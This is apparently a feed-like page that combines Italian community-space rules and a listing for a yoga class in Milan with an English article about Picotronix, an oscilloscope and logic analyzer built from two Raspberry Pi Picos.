Riutilizza il bicchiere e quando hai finito di usarlo mettilo nei contenitori predisposti

Non buttare rifiuti per terra, utilizza i posacenere e bidoni della raccolta differenziata

Se hai dubbi CHIEDI: il tuo interessamento sarà apprezzato e ti sentirai parte di ciò che stai vivendo. Collabora alla buona riuscita dell’esperienza per tutt*, sii rispettos* e condividi la presa bene ❤

Lasciare pulito ciò che trovi pulito è Autogestione.

Lasciare pulito ciò che trovi sporco è Cura.

Lo spazio della Cascina è accessibile alle persone con difficoltà o disabilità motorie

puntello.org/event/odiamo-ogni…

VINYASA YOGA

Cascina Torchiera - Piazzale Cimitero Maggio 18, Milano
(lunedì, 9 febbraio 19:30)

Corso all'attivo da anni e aperto a tuttə!

Un'occasione per ricontattare il corpo, spingendolo al di là del proprio limite personale per restare con la mente ben salda al presente!

A offerta libera e consapevole

Per info: Maria 3396787195

puntello.org/event/vinyasa-yog…

Hackers have been building their own basic oscilloscopes out of inexpensive MCUs and cheap LCD screens for some years now, but microcontrollers have recently become fast enough to actually make such ‘scopes useful. [NJJ], for example, used a pair of Raspberry Pi Picos to build Picotronix, an extensible combined oscilloscope and logic analyzer.

This isn’t an open-source project, but it is quite well-documented, and the general design logic and workings of the device are freely available. The main board holds two Picos, one for data sampling and one to handle control, display, and external communication. The control unit is made out of stacked PCBs surrounded by a 3D-printed housing; the pinout diagrams printed on the back panel are a helpful touch. One interesting technique was to use a trimmed length of clear 3D printer filament as a light pipe for an indicator LED.

Even the protocol used to communicate between the Picos is documented; the datagrams are rather reminiscent of Ethernet frames, and can originate either from one of the Picos or from a host computer. This lets the control board operate as an automatic testing station reporting data over a wireless or USB-connected network. The display module is therefore optional hardware, and a variety of other boards (called picoPods) can be connected to the Picotronix control board. These include a faster ADC, adapters for various analog input spans, a differential analog input probe, a 12-bit logic state analyzer, and a DAC for signal generation.

If this project inspired you to make your own, we’ve also seen other Pico-based oscilloscopes before, including one that used a phone for the display.

hackaday.com/2026/02/02/a-high…